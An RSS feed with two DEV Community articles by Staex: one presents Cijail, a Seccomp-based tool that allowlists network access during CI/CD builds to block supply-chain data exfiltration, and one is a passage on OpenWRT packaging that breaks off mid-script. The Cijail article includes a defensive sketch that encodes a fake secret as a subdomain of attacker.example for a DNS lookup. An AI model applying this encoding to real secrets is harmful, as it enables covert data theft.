<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Staex</title>
    <description>The latest articles on DEV Community by Staex (@staex).</description>
    <link>https://dev.to/staex</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Forganization%2Fprofile_image%2F7990%2Ffbb52fb8-05f0-44cc-a33c-22aa8f18372b.png</url>
      <title>DEV Community: Staex</title>
      <link>https://dev.to/staex</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/staex"/>
    <language>en</language>
    <item>
      <title>Cijail: How to protect your CI/CD pipelines from supply chain attacks?</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Wed, 05 Jun 2024 11:00:00 +0000</pubDate>
      <link>https://dev.to/staex/cijail-how-to-protect-your-cicd-pipelines-from-supply-chain-attacks-21fn</link>
      <guid>https://dev.to/staex/cijail-how-to-protect-your-cicd-pipelines-from-supply-chain-attacks-21fn</guid>
      <description>&lt;p&gt;Supply chain attacks are especially popular nowadays, and there is a good reason for that. Many build tools such as Cargo, Pip and NPM were not designed to protect against them (&lt;a href="https://wildwolf.name/secure-way-run-npm-ci/"&gt;NPM example&lt;/a&gt;, &lt;a href="https://internals.rust-lang.org/t/about-supply-chain-attacks/14038"&gt;Cargo-related discussion&lt;/a&gt;). At the same time maintainers' tools such as Nix, Guix, and the RPM and DEB build systems successfully mitigate such attacks. These tools precisely control what files are downloaded over the network before the build starts and prohibit any network access during the build phase itself. In this article we introduce a tool called &lt;a href="https://github.com/staex-io/cijail"&gt;Cijail&lt;/a&gt; that allows you to adopt similar rules for developers' build systems such as Cargo, Pip and NPM. This tool is based on Linux &lt;a href="https://man7.org/linux/man-pages/man2/seccomp.2.html"&gt;Seccomp&lt;/a&gt;, can be run inside CI/CD pipelines, and does not require superuser privileges. It protects against data exfiltration over DNS via deep packet inspection, effectively limiting the damage supply chain attacks can cause. The tool is open source and written in Rust.&lt;/p&gt;

&lt;h2&gt;
  
  
  Table of contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Why protect from supply chain attacks?&lt;/li&gt;
&lt;li&gt;What is a supply chain attack?&lt;/li&gt;
&lt;li&gt;How is the data exfiltrated over DNS?&lt;/li&gt;
&lt;li&gt;
How can we protect ourselves from supply chain attacks?

&lt;ul&gt;
&lt;li&gt;Example: Cargo + GitHub (Cijail itself)&lt;/li&gt;
&lt;li&gt;Example: NPM + GitLab (static website)&lt;/li&gt;
&lt;li&gt;Caveat: cargo-deny via HTTPS proxy&lt;/li&gt;
&lt;li&gt;Caveat: NPM via HTTPS proxy&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Why protect from supply chain attacks?
&lt;/h2&gt;

&lt;p&gt;Supply chain attacks became popular with the introduction of developers' tools that manage a project's dependencies. In contrast to maintainers' tools, they do not block network access during the build phase, and hackers use this seemingly minor gap to exfiltrate secrets by bundling malicious scripts with a dependency and executing these scripts during the build phase. It takes only one popular dependency to be compromised for these scripts to run on a multitude of developers' computers and CI/CD pipelines and steal private keys. This is an unlikely event, but the damage it may cause is catastrophic: private keys might give access to a cryptowallet (on a developer's machine), to a server via SSH, to a static website via a cloud upload endpoint etc. From our perspective, protecting against them by default is like wearing a seat belt: no one expects a car crash, but everyone expects the belt to save their life in an unlikely catastrophic situation.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;What is a supply chain attack?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxp2cpgxlek096m88dd7o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxp2cpgxlek096m88dd7o.png" alt="The anatomy of a supply chain attack." width="640" height="245"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A supply chain attack starts with a hacker getting access to the repository of a popular software package. The hacker can use social engineering, zero-day vulnerabilities in operating systems, or breaches in the repository management system itself. Usually two-factor authentication protects against the attack at this phase.&lt;/p&gt;

&lt;p&gt;If the hacker manages to get access to the repository, he or she proceeds to make a malicious commit or (more likely) a new release archive that contains malicious code. Usually signed commits and signed releases/packages/archives protect against the attack at this phase.&lt;/p&gt;

&lt;p&gt;Then the attacker waits until dependent software packages download the new release of the breached dependency and execute the malicious code in their CI/CD pipelines or on developers' computers. To exfiltrate the secrets, the hacker would disguise the traffic as DNS, for example, and set up a DNS server to collect them.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;How is the data exfiltrated over DNS?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5bn3hgqo6fe52yr8dl40.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5bn3hgqo6fe52yr8dl40.png" alt="Data exfiltration over DNS." width="800" height="531"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Data exfiltration over DNS works as follows. A malicious actor sets up a DNS server for his or her domain, then encodes the secrets as subdomains of this domain. Eventually the DNS lookup request reaches the hacker's DNS server via other perfectly secure and legitimate publicly available DNS servers. This exfiltration uses DNS as a side channel, one of many that hackers might use (another popular one being the ICMP protocol).&lt;/p&gt;
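&lt;p&gt;To make the encoding step concrete, here is a sketch (the secret and the &lt;code&gt;attacker.example&lt;/code&gt; domain are made up): the stolen value is hex-encoded into a valid DNS label, and a single ordinary lookup then delivers it to the hacker's name server.&lt;/p&gt;

```shell
# Sketch: encode a (fake) secret as a DNS label; attacker.example is hypothetical.
secret='AKIA1234'
label=$(printf '%s' "$secret" | od -An -tx1 | tr -d ' \n')  # hex-encode the secret
echo "$label.attacker.example"  # prints 414b494131323334.attacker.example
# Resolving this name, e.g. `dig "$label.attacker.example"`, would hand the
# secret to whatever DNS server is authoritative for attacker.example.
```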

&lt;p&gt;Conveniently for the attacker, DNS traffic is rarely blocked because other software relies on DNS. One way to protect against this attack is either to allow resolving only certain domains via deep packet inspection or to block Internet access altogether. Maintainers' tools use the latter approach, while Cijail adopts the former, because developers' tools were not designed to have the traffic blocked during the build phase.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;How can we protect ourselves from supply chain attacks?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3lww05myu0cb7coddlu1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3lww05myu0cb7coddlu1.png" alt="Cijail architecture." width="640" height="173"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Cijail protects against supply chain attacks by whitelisting the domain names, IP addresses, ports and URLs that a script is allowed to access. This is implemented using Seccomp and a MITM HTTPS proxy server. Cijail launches the supplied command in a child process inside a Seccomp jail with the &lt;code&gt;SECCOMP_RET_USER_NOTIF&lt;/code&gt; flag. Simultaneously, a control process is launched that receives notifications from the jailed process and decides whether the resource can be accessed, replying via the &lt;code&gt;SECCOMP_IOCTL_NOTIF_SEND&lt;/code&gt; ioctl. Finally, a MITM HTTPS proxy is launched as a third process. This process decrypts all HTTPS requests to check that the corresponding URL is allowed. For the MITM HTTPS proxy to work, its CA certificate is automatically installed in the operating system as trusted.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# no traffic is allowed&lt;/span&gt;
🌊 cijail dig staex.io @1.1.1.1
&lt;span class="o"&gt;[&lt;/span&gt;Sun Apr 04 17:28:22 2024] cijail: deny connect 1.1.1.1:53

&lt;span class="c"&gt;# DNS request (connection to DNS server is allowed whereas name resolution is not)&lt;/span&gt;
🌊 &lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;CIJAIL_ENDPOINTS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'1.1.1.1:53'&lt;/span&gt; cijail dig staex.io @1.1.1.1
&lt;span class="o"&gt;[&lt;/span&gt;Sun Apr 04 17:28:22 2024] cijail: allow connect 1.1.1.1:53
&lt;span class="o"&gt;[&lt;/span&gt;Sun Apr 04 17:28:22 2024] cijail: deny sendmmsg staex.io

&lt;span class="c"&gt;# DNS request and name resolution is allowed&lt;/span&gt;
🌊 &lt;span class="nb"&gt;env &lt;/span&gt;&lt;span class="nv"&gt;CIJAIL_ENDPOINTS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'1.1.1.1:53 staex.io'&lt;/span&gt; cijail dig staex.io @1.1.1.1
&lt;span class="o"&gt;[&lt;/span&gt;Sun Apr 04 17:28:22 2024] cijail: allow connect 1.1.1.1:53
&lt;span class="o"&gt;[&lt;/span&gt;Sun Apr 04 17:28:22 2024] cijail: allow sendmmsg staex.io
... dig output ...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Example: Cargo + GitHub (Cijail itself)
&lt;/h3&gt;

&lt;p&gt;We tried using Cijail to build Cijail itself. To use Cijail in your GitHub Actions, you need to add the following line to your Dockerfile.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; --from=ghcr.io/staex-io/cijail:0.6.8 / /usr/local&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then you have to prepend &lt;code&gt;cijail&lt;/code&gt; to every command in every step because GitHub Actions do not respect Docker's &lt;code&gt;ENTRYPOINT&lt;/code&gt;. Then all you need to do is add a &lt;code&gt;CIJAIL_ENDPOINTS&lt;/code&gt; environment variable with the list of allowed URLs and other endpoints. The resulting workflow specification for Cijail looks like the following.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;variables&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;CIJAIL_ENDPOINTS&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;https://github.com/lyz-code/yamlfix/                          # git&lt;/span&gt;
    &lt;span class="s"&gt;https://pypi.org/simple/                                      # pip&lt;/span&gt;
    &lt;span class="s"&gt;https://files.pythonhosted.org/packages/                      # pip&lt;/span&gt;
    &lt;span class="s"&gt;https://static.crates.io/crates/                              # cargo&lt;/span&gt;
    &lt;span class="s"&gt;https://index.crates.io/                                      # cargo&lt;/span&gt;
    &lt;span class="s"&gt;https://uploads.github.com/repos/staex-io/cijail/releases/    # github&lt;/span&gt;
    &lt;span class="s"&gt;https://api.github.com/repos/staex-io/cijail/releases         # github&lt;/span&gt;
&lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Lint&lt;/span&gt;
    &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cijail ./ci/build.sh&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Example: NPM + GitLab (static website)
&lt;/h3&gt;

&lt;p&gt;For GitLab the approach is similar. This time you might consider adding &lt;code&gt;ENTRYPOINT ["/usr/local/bin/cijail"]&lt;/code&gt; to your &lt;code&gt;Dockerfile&lt;/code&gt; so that you do not have to prepend &lt;code&gt;cijail&lt;/code&gt; to every command in your pipeline. The resulting workflow specification for a static website looks like the following.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;CIJAIL_ENDPOINTS&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
  &lt;span class="s"&gt;https://registry.npmjs.org/                  # npm&lt;/span&gt;
  &lt;span class="s"&gt;https://github.com/lyz-code/yamlfix/         # git&lt;/span&gt;
  &lt;span class="s"&gt;https://pypi.org/simple/                     # pip&lt;/span&gt;
  &lt;span class="s"&gt;https://files.pythonhosted.org/packages/     # pip&lt;/span&gt;
  &lt;span class="s"&gt;9.9.9.9:53                                   # rsync&lt;/span&gt;
  &lt;span class="s"&gt;staex.io:22                                  # rsync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Caveat: cargo-deny via HTTPS proxy
&lt;/h3&gt;

&lt;p&gt;One particular problem that we encountered is that some programs bundle trusted root CA certificates in their binaries. This is the case for cargo-deny: it uses the webpki-roots crate, which bundles root CA certificates as byte arrays directly in the cargo-deny binary. It is impossible to add Cijail's root certificate to such a program. The current workaround is to run cargo-deny without Cijail.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# our MITM proxy failed to trick cargo-deny :-(&lt;/span&gt;
🌊 cijail cargo deny check
&lt;span class="o"&gt;[&lt;/span&gt;ERROR] error trying to connect: invalid peer certificate: UnknownIssuer

&lt;span class="c"&gt;# a workaround&lt;/span&gt;
🌊 cijail cargo deny check &lt;span class="nt"&gt;--disable-fetch&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;    &lt;span class="c"&gt;# a warm-up (download dependencies)&lt;/span&gt;
🌊 cargo deny check                                   &lt;span class="c"&gt;# run without cijail 😮&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Caveat: NPM via HTTPS proxy
&lt;/h3&gt;

&lt;p&gt;Another problem comes from the fact that NPM is not as reliable behind an HTTPS proxy as without one. In some cases it creates thousands of connections to download a few dependencies. The workaround that we found is to specify &lt;code&gt;maxsockets=1&lt;/code&gt; in NPM's configuration.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1000+ connections for 340 dependencies?&lt;/span&gt;
🌊 cijail npm &lt;span class="nb"&gt;install&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;Fri May 24 07:02:13 2024] cijail: allow connect 127.0.0.1:39317
&lt;span class="o"&gt;[&lt;/span&gt;Fri May 24 07:02:13 2024] cijail: allow connect 127.0.0.1:39317
&lt;span class="o"&gt;[&lt;/span&gt;Fri May 24 07:02:13 2024] cijail: allow connect 127.0.0.1:39317
... the message repeats 1000+ &lt;span class="nb"&gt;times
&lt;/span&gt;npm ERR! code ECONNREFUSED

&lt;span class="c"&gt;# a workaround&lt;/span&gt;
🌊 npm config &lt;span class="nb"&gt;set &lt;/span&gt;maxsockets 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Conclusion
&lt;/h2&gt;

&lt;p&gt;To summarize, most CI/CD pipelines are vulnerable to data exfiltration via DNS because developers' tools like Cargo, NPM and pip do not block network access during the build phase, in contrast to maintainers' tools like Nix, Guix, and the RPM and DEB build systems that do.&lt;/p&gt;

&lt;p&gt;The best way to protect against any data exfiltration is to split building the package into a download phase and a build phase. During the download phase the dependencies are downloaded, but no scripts are executed and no packages are built. During the build phase the scripts are executed and the packages are built, but network access is disabled. This simple technique protects against any type of data exfiltration without the need for deep packet inspection.&lt;/p&gt;

&lt;p&gt;The major problem with implementing such a split in developers' tools is that it might break some packages. Another problem is that blocking network access in a Docker container might require additional privileges that are not granted by default. Below is an example of how to do this manually for NPM and Cargo.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# cargo example&lt;/span&gt;
🌊 cargo fetch    &lt;span class="c"&gt;# only download dependencies&lt;/span&gt;
🌊 unshare &lt;span class="nt"&gt;-rn&lt;/span&gt; cargo build    &lt;span class="c"&gt;# build packages and run scripts without network access (will not work in a Docker container)&lt;/span&gt;

&lt;span class="c"&gt;# npm example&lt;/span&gt;
🌊 npm clean-install &lt;span class="nt"&gt;--ignore-scripts&lt;/span&gt;    &lt;span class="c"&gt;# only download dependencies&lt;/span&gt;
🌊 unshare &lt;span class="nt"&gt;-rn&lt;/span&gt; npm rebuild    &lt;span class="c"&gt;# build packages and run scripts without network access (will not work in a Docker container)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Discuss on &lt;a href="https://www.reddit.com/r/rust/comments/1d6zs8s/cargo_and_supply_chain_attacks/"&gt;Reddit&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://staex.io/docs/91ea2cf3/cijail-slides.pdf"&gt;Slides&lt;/a&gt; from &lt;a href="https://berline.rs/2024/05/30/rust-and-tell.html"&gt;Rust &amp;amp; Tell: It is not June yet&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/staex-io/cijail"&gt;Cijail git repo&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>linux</category>
      <category>rust</category>
      <category>javascript</category>
      <category>python</category>
    </item>
    <item>
      <title>How to build and test your OpenWRT packages with Docker</title>
      <dc:creator>Ivan</dc:creator>
      <pubDate>Tue, 30 Jan 2024 12:00:00 +0000</pubDate>
      <link>https://dev.to/staex/how-to-build-and-test-your-openwrt-packages-with-docker-1bco</link>
      <guid>https://dev.to/staex/how-to-build-and-test-your-openwrt-packages-with-docker-1bco</guid>
      <description>&lt;p&gt;Building and testing software packages for OpenWRT is challenging because this Linux distribution often runs on devices with exotic architectures and uses centralized configuration (&lt;a href="https://openwrt.org/docs/guide-user/base-system/uci"&gt;UCI&lt;/a&gt;) with which you often need to integrate your software. In this article we will use Docker and QEMU to test package installation on the MIPS architecture and discuss what scripts and other files to include in the package to better integrate your software with UCI and OpenWRT itself.&lt;/p&gt;

&lt;h1&gt;
  
  
  Table of contents
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;Why OpenWRT?&lt;/li&gt;
&lt;li&gt;
How to build an OpenWRT package?

&lt;ul&gt;
&lt;li&gt;Post-install scripts&lt;/li&gt;
&lt;li&gt;Post-delete scripts&lt;/li&gt;
&lt;li&gt;Pre-delete scripts&lt;/li&gt;
&lt;li&gt;Init scripts&lt;/li&gt;
&lt;li&gt;First-boot scripts&lt;/li&gt;
&lt;li&gt;Persist files across system upgrades&lt;/li&gt;
&lt;li&gt;Package contents&lt;/li&gt;
&lt;/ul&gt;

&lt;/li&gt;
&lt;li&gt;
How to test an OpenWRT package with Docker

&lt;ul&gt;
&lt;li&gt;Testing packages for host architecture&lt;/li&gt;
&lt;li&gt;Testing packages for non-host architecture&lt;/li&gt;
&lt;/ul&gt;

&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ul&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Why OpenWRT?
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://openwrt.org/"&gt;OpenWRT&lt;/a&gt; is a popular Linux distribution for network routers that brings the power of Linux kernel to resource-constrained devices. Companies use it as a base for their own routers' firmware, regular people use it to replace vendor-provided firmware which is often closed-source and lack many features compared to open-source OpenWRT.&lt;/p&gt;

&lt;p&gt;Apart from OpenWRT there is the FreeBSD-based &lt;a href="https://pfsense.org/"&gt;pfSense&lt;/a&gt;. This distribution supports only the x86 (64-bit) architecture, whereas OpenWRT supports x86, ARM and MIPS. FreeBSD and Linux are completely different kernels, and you would need a whole different setup for building FreeBSD packages.&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;a&gt;&lt;/a&gt;How to build an OpenWRT package?
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faewic3k9b9yfp3uhg73b.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faewic3k9b9yfp3uhg73b.jpg" alt="Photo by Debby Hudson on Unsplash." width="640" height="424"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;OpenWRT uses the &lt;a href="https://openwrt.org/docs/guide-user/additional-software/opkg"&gt;opkg&lt;/a&gt; package manager, which can install &lt;a href="https://en.wikipedia.org/wiki/Opkg"&gt;ipk/opk&lt;/a&gt; packages from online repositories and the local file system; to build your own package you need &lt;a href="https://git.yoctoproject.org/opkg-utils/"&gt;opkg-utils&lt;/a&gt;. The ipk/opk package format is similar to &lt;a href="https://en.wikipedia.org/wiki/Deb_(file_format)"&gt;deb&lt;/a&gt; but uses &lt;a href="https://man7.org/linux/man-pages/man1/tar.1.html"&gt;tar&lt;/a&gt; instead of &lt;a href="https://man7.org/linux/man-pages/man1/ar.1.html"&gt;ar&lt;/a&gt; to archive the files. The simplest way of building a package is to use the &lt;code&gt;opkg-build&lt;/code&gt; command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Flag `-c` replaces `ar` with `tar`. This is mandatory for OpenWRT.&lt;/span&gt;
🌊 opkg-build &lt;span class="nt"&gt;-c&lt;/span&gt; input-dir output-dir
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;input-dir&lt;/code&gt; contains the files that you want to install plus a &lt;code&gt;CONTROL&lt;/code&gt; directory with metadata (for the &lt;em&gt;deb&lt;/em&gt; format this directory is called &lt;code&gt;DEBIAN&lt;/code&gt;, and you can use this name with &lt;code&gt;opkg-build&lt;/code&gt; as well). We are not aware of any other major differences between &lt;em&gt;deb&lt;/em&gt; and &lt;em&gt;ipk/opk&lt;/em&gt;. For this reason we ended up converting to &lt;em&gt;ipk&lt;/em&gt; from the &lt;em&gt;deb&lt;/em&gt; generated by &lt;a href="https://fpm.readthedocs.io/"&gt;fpm&lt;/a&gt;, a tool that we use to produce packages for other Linux distributions. However, the contents of the pre/post install/update/remove scripts are different for OpenWRT, and there are other special files that you might want to include in the package.&lt;/p&gt;
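&lt;p&gt;For reference, a minimal &lt;code&gt;CONTROL/control&lt;/code&gt; file might look like the following (the package name and field values are illustrative; the field set mirrors deb's control format):&lt;/p&gt;

```
Package: myapp
Version: 1.0.0-1
Architecture: mips_24kc
Maintainer: Example Maintainer
Depends: libc
Description: An example application packaged for OpenWRT.
```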

&lt;p&gt;The package includes scripts that are run prior to or after the installation, update and removal of the package. Often package maintainers include them to start/stop services and update firewall rules.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Post-install scripts
&lt;/h2&gt;

&lt;p&gt;Setting up firewall rules in package scripts is not typical of Linux distributions other than OpenWRT. This is due to the fact that OpenWRT uses the &lt;a href="https://openwrt.org/docs/guide-user/base-system/uci"&gt;Unified Configuration Interface (UCI)&lt;/a&gt; — a centralized way of managing system configuration. Through UCI you can set up firewall rules that are inactive by default and can later be enabled via OpenWRT's &lt;a href="https://openwrt.org/docs/guide-user/luci/webinterface.overview"&gt;web interface&lt;/a&gt; or via the command-line interface.&lt;/p&gt;

&lt;p&gt;The following commands set up a firewall rule that accepts TCP and UDP traffic on port 1234. The rule is disabled by default.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# post-install script&lt;/span&gt;
uci &lt;span class="nt"&gt;-q&lt;/span&gt; batch &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;/dev/null &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;'
add firewall rule
set firewall.@rule[-1].dest_port='1234'
set firewall.@rule[-1].src='*'
set firewall.@rule[-1].name='Allow-MyApp-any'
set firewall.@rule[-1].proto='udp tcp'
set firewall.@rule[-1].target='ACCEPT'
set firewall.@rule[-1].enabled='0'
commit firewall
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Usually you would run each line as a separate &lt;em&gt;uci&lt;/em&gt; command (e.g. &lt;code&gt;uci add firewall rule&lt;/code&gt;), but &lt;code&gt;uci batch&lt;/code&gt; is generally faster for a large number of lines. It is up to you whether to enable or disable the rule by default: for public-facing services (e.g. VPNs) it is generally safe to open the port by default; for everything else (e.g. a DNS resolver like Stubby) I would rather close the port by default.&lt;/p&gt;

&lt;p&gt;Later the rule can be enabled with the following commands.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# NNN is the actual index of the rule&lt;/span&gt;
uci &lt;span class="nb"&gt;set &lt;/span&gt;firewall.@rule[NNN].enabled&lt;span class="o"&gt;=&lt;/span&gt;1
uci commit firewall
fw3 reload
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  &lt;a&gt;&lt;/a&gt;Post-delete scripts
&lt;/h2&gt;

&lt;p&gt;Deleting the rules is more involved, as you need to find the rule index and delete all the matching lines. To distinguish between a package update and package removal you need to check the first argument of the script.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# post-delete script&lt;/span&gt;

delete_rule&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;
    config_get name &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$1&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; name
    &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="nb"&gt;test&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$name&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Allow-MyApp-any"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then
        &lt;/span&gt;uci &lt;span class="nt"&gt;-q&lt;/span&gt; delete firewall.&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$1&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true
    &lt;/span&gt;&lt;span class="k"&gt;fi&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$1&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="k"&gt;in
&lt;/span&gt;0 &lt;span class="p"&gt;|&lt;/span&gt; remove&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nb"&gt;.&lt;/span&gt; /lib/functions.sh
    config_load firewall
    config_foreach delete_rule rule
